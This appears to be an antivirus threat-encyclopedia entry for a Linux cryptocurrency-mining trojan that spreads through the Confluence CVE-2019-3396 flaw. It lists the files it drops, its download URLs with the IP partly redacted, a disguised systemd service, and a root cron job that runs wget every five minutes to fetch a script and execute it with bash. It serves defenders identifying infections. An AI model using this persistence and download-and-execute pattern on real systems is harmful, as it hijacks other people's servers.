Coinminer.SH.MALXMR.UWEJH

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Arrival Details

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

This malware arrives via the following means:

• Taking advantage of the vulnerability of CVE-2019-3396 Confluence Widget Connector

Installation

This Trojan drops the following files:

• /tmp/{7 Random Filename 3}
• /tmp/{7 Random Filename 4}
• /tmp/prot

It adds the following processes:

• /tmp/{7 Random Filename 1}
• /tmp/{7 Random Filename 2} {7 Random Filename 3}
• /tmp/{7 Random Filename 2} {7 Random Filename 4}
• /tmp/{7 Random Filename 2} prot

Download Routine

This Trojan saves the files it downloads using the following names:

• /tmp/{7 Random Filename 1}
• /tmp/seasame

Other Details

This Trojan does the following:

• It downloads from the following URL depending on system processor:
  • {BLOCKED}.{BLOCKED}.56.161:443/{URL}
  • Where {URL} are as follows:
  • 64-bit:
  • 46d.jpg
  • 46du.jpg
  • 46s.jpg
  • 46su.jpg
  • 86d.jpg
  • 86du.jpg
  • 86s.jpg
  • 86su.jpg
  • 32-bit:
  • 43d.jpg
  • 43du.jpg
  • 43s.jpg
  • 43su.jpg
  • 83d.jpg
  • 83du.jpg
  • 83s.jpg
  • 83su.jpg
  • a6.jpg
  • a6u.jpg
• It creates the following services to enable automatic execution of itself:
  • /etc/systemd/system/cloud_agent.service
• It creates the following cron jobs to enable automatic execution every 5 minutes:
  • Paths: /var/spool/cron/crontabs/root
  • Content: */5 * * * * /usr/bin/wgetak -q -O /tmp/seasame http://{BLOCKED}.{BLOCKED}.{BLOCKED}.161:443 & bash /tmp/seasame